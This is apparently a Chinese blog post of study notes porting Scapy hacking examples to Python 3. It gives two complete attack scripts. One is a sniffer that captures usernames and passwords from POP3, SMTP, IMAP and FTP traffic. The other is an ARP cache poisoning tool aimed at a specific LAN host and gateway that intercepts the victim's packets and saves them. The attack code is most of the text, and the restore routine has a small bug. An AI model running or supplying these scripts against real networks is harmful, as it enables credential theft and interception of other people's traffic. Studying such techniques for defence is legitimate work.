Scapy:网络掌控者？

哇咔咔，我喜欢！可是我的问题来了，貌似Scapy只支持Python2，那哥哥这Python3咋办呢？

【最新更新：目前scapy目前已经支持Python3了，就不用折腾这个了。】

按照其说明进行安装即可：

pip3 install scapy-python3 # 通过pip直接安装scapy3库

brew install libdnet # 补充安装scapy3需要的libdnet

窃取Email/FTP认证

#!/usr/bin/env python3

# -*- code: utf-8 -*-

from scapy.all import *

# 数据包回调函数

def packet_callback(packet):

#print(packet.show())

if packet[TCP].payload:

mail_packet = str(packet[TCP].payload)

if "user" in mail_packet.lower() or "pass" in mail_packet.lower():

print ("[*] Server: %s" % packet[IP].dst)

print ("[*] %s" % packet[TCP].payload)

# 开启嗅探器

sniff(filter="tcp port 110 or tcp port 25 or tcp port 143 or tcp port 21",prn=packet_callback, store=0,count=0)

# 110(POP3),143(IMAP),25(SMTP),21(FTP)

# store=0 不在内存中保存原始数据包。

代码就这样了，我完全不明白书本上是如何实现账号密码抓取的。(现在的邮箱登录应该都用的是SSL加密)，总之我没法重现作者的结果。

最后我加上了FTP的21端口，获取了如下信息。

有些奇奇怪怪的WARNING，我也不大理解到底是什么问题，应该是由于Scapy3尚未完善导致的吧！

利用Scapy进行ARP缓存投毒

这里我将使用mac作为攻击主机，攻击目标为另外一台实体Windows主机。(原本打算攻击运行win7的虚拟机，但不知为何总是无法获取虚拟机的mac地址~)

from scapy.all import *

import os

import sys

import threading

import signal

interface = "en0" # Mac电脑的Wifi网卡

target_ip = "192.168.200.46"

gateway_ip = "192.168.200.1"

packet_count = 1000

poisoning = True

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):

# slightly different method using send

print ("[*] Restoring target...")

send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",

hwsrc=gateway_mac), count=5)

send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",

hwsrc=target_ip), count=5)

def get_mac(ip_address):

responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

# return the MAC address from a response

for s, r in responses:

return r[Ether].src

return None

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):

global poisoning

poison_target = ARP()

poison_target.op = 2

poison_target.psrc = gateway_ip

poison_target.pdst = target_ip

poison_target.hwdst = target_mac

poison_gateway = ARP()

poison_gateway.op = 2

poison_gateway.psrc = target_ip

poison_gateway.pdst = gateway_ip

poison_gateway.hwdst = gateway_mac

print ("[*] Beginning the ARP poison. [CTRL-C to stop]")

while poisoning:

send(poison_target)

send(poison_gateway)

time.sleep(2)

print ("[*] APR poison attack finished.")

return

# conf是在scapy库中声明的一个Conf类，在config.py中，不太理解有啥用。

# set our interface

conf.iface = interface

# verb : level of verbosity, from 0 (almost mute) to 3 (verbose)

conf.verb = 0

print( "[*] Setting up %s" % interface)

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:

print ("[!!!] Failed to get gateway MAC. Exiting.")

sys.exit(0)

else:

print ("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)

if target_mac is None:

print ("[!!!] Failed to get target MAC. Exiting.")

sys.exit(0)

else:

print ("[*] Target %s is at %s" % (target_ip, target_mac))

# start poison thread

poison_thread = threading.Thread(target=poison_target,

args=(gateway_ip, gateway_mac, target_ip, target_mac))

poison_thread.start()

try:

print ("[*] Starting sniffer for %d packets" % packet_count)

bpf_filter = "ip host %s" % target_ip # BPF过滤规则

packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)

except KeyboardInterrupt:

pass

finally:

# write out the captured packets

print ("[*] Writing packets to arper.pcap")

wrpcap("arper.pcap", packets)

# get the poison thread to stop

poisoning = False

# wait for poisoning thread to exit

poison_thread.join()

# restore the network

restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

sys.exit(0)

mac上运行结果：

有各种稀奇古怪的提示，各种不理解。

Windows主机上看到的结果：(a0-99-9v-0d-80-63是我Mac的MAC，ha'h)

处理PCAP文件

安装openCV 太费劲了！ 这一部分跳过！